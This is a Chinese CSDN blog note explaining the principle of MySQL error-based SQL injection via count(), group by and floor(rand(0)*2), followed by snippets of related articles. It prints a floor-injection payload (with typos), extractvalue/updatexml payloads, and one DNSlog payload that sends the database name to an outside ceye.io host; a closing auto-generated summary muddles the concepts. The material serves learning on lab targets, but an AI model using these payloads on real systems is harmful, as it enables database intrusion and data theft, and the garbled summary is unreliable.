基于count,group by,rand报错的sql注入原理分析

最新推荐文章于 2024-04-19 17:02:43 发布

老-男孩

最新推荐文章于 2024-04-19 17:02:43 发布

阅读量921

点赞数

分类专栏：我的笔记我欠下的债

本文链接：https://blog.csdn.net/qq_43814486/article/details/89041691

版权

我的笔记同时被 2 个专栏收录

15 篇文章 1 订阅

订阅专栏

我欠下的债

6 篇文章 1 订阅

订阅专栏

新手向解释
原理：使用这些函数制造错误，把这个错误用concat和我们构造的查询语句合并起来，并让系统返回错误信息同时返回我们查询的信息。
以经典的floor注入语句为例:

kobe' and (select 2 from (select coint(*),conat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a)#

精华：count 和 group by 一起用会建立一个虚拟表，再加入rand使之出现重复的key（主键值），导致报错。
详细原理分析：
https://blog.csdn.net/cried_cat/article/details/80022378

以后学会后一定回来补上自己的理解！

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

老-男孩

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
1
评论
复制链接

分享到 QQ

分享到新浪微博

扫一扫

专栏目录

SQL报错注入

qq_64332865的博客

02-18

609

基于报错的注入，是指通过构造特定的SQL语句，让攻击者想要查询的信息(如数据库名、版本号、用户名等）通过页面的错误提示回显出来。报错注入一般需要具备两个前提条件:(1)Web应用程序未关闭数据库报错函数，对于一些SQL语句的错误直接回显在页面上;(2）后台未对一些具有报错功能的函数进行过滤。常用的报错功能函数包括extractvalue()、 updatexml)、floor()、exp()等。关于floor()函数,在进行报错注入时，floor()函数一般需要与rand()、count()、g

sql注入中rand()和group by双注入报错（以sqli-labs_Less13为例）

weixin_46145442的博客

11-30

1121

利用rand()重复计数作为group by的对象分组达到主键重复目的，完成双注入报错。

1 条评论您还未登录，请先登录后发表或查看评论

报错型sql注入原理分析

weixin_33842304的博客

01-12

267

0x00：前言关于sql注入，经久不衰，现在的网站一般对sql注入的防护也相对加强了，2016年的***测试报告中，出现最多的是xss（跨站脚本***）和明文传输等，但是对sql注入的利用方式，也相对成熟，详细了解sql注入，可以参考之前的文章。http://wt7315.blog.51cto.com/10319657/1828167 今天主要分享下sql注入中的报错...

SQL注入：基于报错的SQL注入

weixin_73180072的博客

12-04

299

基于报错的SQL注入

基于报错的sql注入

qq_44111753的博客

11-21

305

MYSQL中默认有个information schema数据库，用来存储数据库元信息。其中具有表schemata(数据库名)、tables(表名)、 columns(列名或字段名)。 schemata：schema_ name字段用来存储数据库名。 tables：table_ schema和table_ name分别用来存储数据库名和表名。 columns：table_schema(数据库名)、table_name(表名)、column name(字段名) 1、发现SQL注入 根据报错信息'1'' LIM

SQL注入—基于报错注入

Snowflake1997的博客

02-18

1126

问SQLi-Labs网站在攻击机Pentest-Atk打开FireFox浏览器，并访问靶机A-SQLi-Labs上的SQLi-Labs网站Less-2。访问的URL为： http://[靶机IP]/sqli-labs/Less-1/ 登录后，根据网页提示，给定一个GET参数，即： http://[靶机IP]/sqli-labs/Less-1/?id=1 此时页面显示id=1的用户名Dump、密码Dump。以此来检验浏览器是否安装Hackbar插件，界面F9按键是启用或停用。寻找.

关于SQL报错注入原理详细解析

qq_45672254的博客

11-17

714

关于SQL报错注入原理详细解析之前读过多篇关于Mysql报错注入之floor(rand(0)*2)报错原理探究的文章，都觉得原理阐述大同小异，但在具体细节上，还是不太明白，结合看过的文章和自己的理解，对SQL报错注入原理进行更细致的分析，身为一名网络安全小白，也是想和刚入门的同学一起研究sql注入原理，文章如果有错误的地方，希望大佬批评指正。有兴趣的同学可以查看此篇文章的链接，了解sql报错注入的一般原理：Mysql报错注入之floor(rand(0)*2)报错原理探究在报错原理分析中，主要困惑我的地方

sql报错注入原理分析

JacobTsang的博客

10-13

1355

研究人员发现，使用group by子句结合rand()函数以及像count（*）这样的聚合函数，在SQL查询时会出现错误，且错误是随机产生的，这就产生了双重查询注入。到底为什么floor()、rand(0)、count()、group by相结合，会产生这种错误呢？转载以前乌云一位哥的文章：种子值为0的rand()函数的输出几乎固定为01101 Okay let get is strai...

SQL注入之floor报错注入以及各个部分详细分析 + iwebsec 实例分析 + updatexml() 报错 + extractvalue() 报错

m0_50917178的博客

12-09

4102

文章目录前言一、什么是floor报错注入二、利用iwebsec模拟实际注入过程三、updatexml()和extractvalue()报错注入四、问题前言本文为作者的学习笔记，主要介绍了floor注入原理，利用注入代码（payload）分析每个部分的作用以此来解释floor注入的原理。在解释过程中会使用phpstudy搭建的MySQL环境，并且利用iwebsec漏洞库来实践。最后顺带介绍updatexml和extractvalue报错注入。提示：以下是本篇文章正文内容，下面案例可供参考一、什么是

SQL注入-基于报错的注入

xdjxi的博客

02-18

582

实验目的熟悉报错功能函数extractvalue()的用法，掌握基于报错的SQL注入基本流程实验步骤本实验的目标是：以SQLi-Labs网站的Less-1为入口，借助extractvalue（）函数，利用基于报错的注入方式获取SQLi-Labs网站用户名和密码 1 访问SQLi-Labs网站 http://(靶机ip)/sql/Less-1/?id=1 2 寻找注入点使用3条payload寻找注入点及判断注入点的类型 http://靶机ip/sql/Less-1/?id=1'运..

SQL注入之基于报错的注入

weixin_68951704的博客

07-05

1045

目录1.GET单引号字符型2.GET数字型3.GET单引号加括号字符型4.GET双引号字符型5.注入利用5.1利用order by判断字段5.2利用联合查询查找信息首先我们打开搭建好的sqli-labs靶场，选择less-1 进入后我们看到这样一行提示请输入一个id值作为对应参数，这里我输入1作为参数，验证后1-14均可以回显输入后login name 和password都显现出来我们输入单引号这里显示错误，我们将错误回显记录下来由此我们可以猜解出SQL语句为select login_name,

get基于报错的sql注入

冷巷(✘_✘)的博客

07-14

1091

目录1.SQL注入的分类数字型字符型2.get基于报错的sql注入发现3.get基于报错的sql注入利用1.利用order by 判断字段数。2.利用union select 联合查询，获取表名。3.利用union select联合查询，获取字段名。4.利用union select 联合查询，获取字段值。4.利用sqlmap测试根据注入为数据类型可将sql注入分为数字型和字符型。例如字符型例如 2.get基于报错的sql注入发现通过在url中修改对应的id值，为正常数字、打数字、字符（单引

GET基于报错的SQL注入

LuckySec

02-11

648

当前用户：select user(); 所有数据库：show databases; 当前数据库：select database(); 当前版本：select version(); mysql常用注释符：#或–空格或/**/ 空格也就是%20 内联注释：/!SQL语句/只有MySQL可以识别，常用来绕过WAF select * from articles where id=id...

sql注入（报错注入）

最新发布

2302_79119987的博客

04-19

1523

实行注入的地方。

SQL注入——基于报错的注入（2）

qq_52072846的博客

02-18

836

实验目的熟悉报错功能函数floor()的用法，掌握基于报错的SQL注入基本流程。实验原理 (1）关于报错注入基于报错的注入，是指通过构造特定的SQL语句，让攻击者想要查询的信息（如数据库名、版本号、用户名等）通过页面的错误提示回显出来。报错注入一般需要具备两个前提条件:(1) Web应用程序未关闭数据库报错函数，对于一些SQL语句的错误直接回显在页面上;(2)后台未对一些具有报错功能的函数进行过滤。常用的报错功能函数包括extractvalue()、updatexml()、floor()、ex

sql注入之报错注入

笔墨稠思

07-07

168

本次注入采用DVWA靶场，靶场等级Low,数据库mysql 基于报错的注入利用mysql自身函数的漏洞来获取数据例如 select * from 表 where id = 1 and (extractvalue(1,concat(0x7e,(select user()),0x7e))); select * from 表 where id=1 and (updatexml(1,concat(0x7e,(select user()),0x7e),1)); 0x7e 是字符~ 的ascii 码的十六进制表

SQL注入---报错注入

zhoutong2323的博客

04-04

1033

在SQL注入报错攻击中，攻击者通过在用户输入的位置注入恶意的SQL代码，使应用程序拼接出错误的SQL语句。当数据库执行错误的SQL语句时，会返回错误信息，这些错误信息可能包含数据库的具体错误信息、相关的数据和表结构等敏感信息。攻击者通过分析这些错误信息来获取相关的数据或者进一步攻击数据库。案例分析：上述sql注入中认为将正确的sql语句database() 改为错误的sql语句 datadase()数据库回显内容为：FUNCTION security.datadase does not exist。

group by报错注入

7hinkSource的博客

08-10

2049

floor（）报错注入 playload select (concat(database(),floor(rand(0)2)))x,concat() from information_schema.tables group by x; 函数 count(*)函数返回给定选择中被选的函数 concat()连接字符串 floor()向下取整 rand()随机数函数 rand(0)伪随机数，生成的随...

sql注入 join原理

07-27

引用\[1\]: SQL注入是一种利用程序对用户输入的不当处理，从而在数据库中执行恶意代码的攻击方式。其中，闭合注入是一种常见的注入方式，通过闭合原有的SQL语句来执行新的SQL语句。在判断注入点时，可以使用order by语句来判断。例如，执行select name,id from student1 where id ='1' order by 3语句，如果成功回显，则说明存在注入点。\[1\] 引用\[2\]: 在SQL注入中，可以使用注释符号来绕过一些限制。例如，使用单引号进行闭合注入时，可以使用注释符号--来注释掉后面的内容。另外，还可以利用DNSlog注入来获取注入结果。构造如下payload：http://127.0.0.1:8124/Less-1/?id=-1' and load_file(concat('\\\\',(select database()),'.1cfto5.ceye.io\\abc'))--+\[2\] 引用\[3\]: SQL注入中的join原理是通过联合查询来获取更多的数据。在注入过程中，可以使用一些函数和语法来实现联合查询，如rand()、floor()、concat()、count()和group by等。同时，通过触发报错来获取更多的信息和数据。\[3\] 综上所述，SQL注入的join原理是通过闭合注入和联合查询来执行恶意代码，并利用一些函数和语法来获取更多的数据。同时，可以通过触发报错来获取更多的信息和数据。 #### 引用[.reference_title] - *1* *2* [一篇文章彻底学懂SQL注入(包含基础数据库句法、SQL注入原理以及所有常见SQL注入类型以及绕过手法)](https://blog.csdn.net/Acong_L/article/details/124634092)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insert_down1,239^v3^insert_chatgpt"}} ] [.reference_item] - *3* [SQL注入：floor报错注入的形成原理分析](https://blog.csdn.net/qq_51789211/article/details/128677727)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insert_down1,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]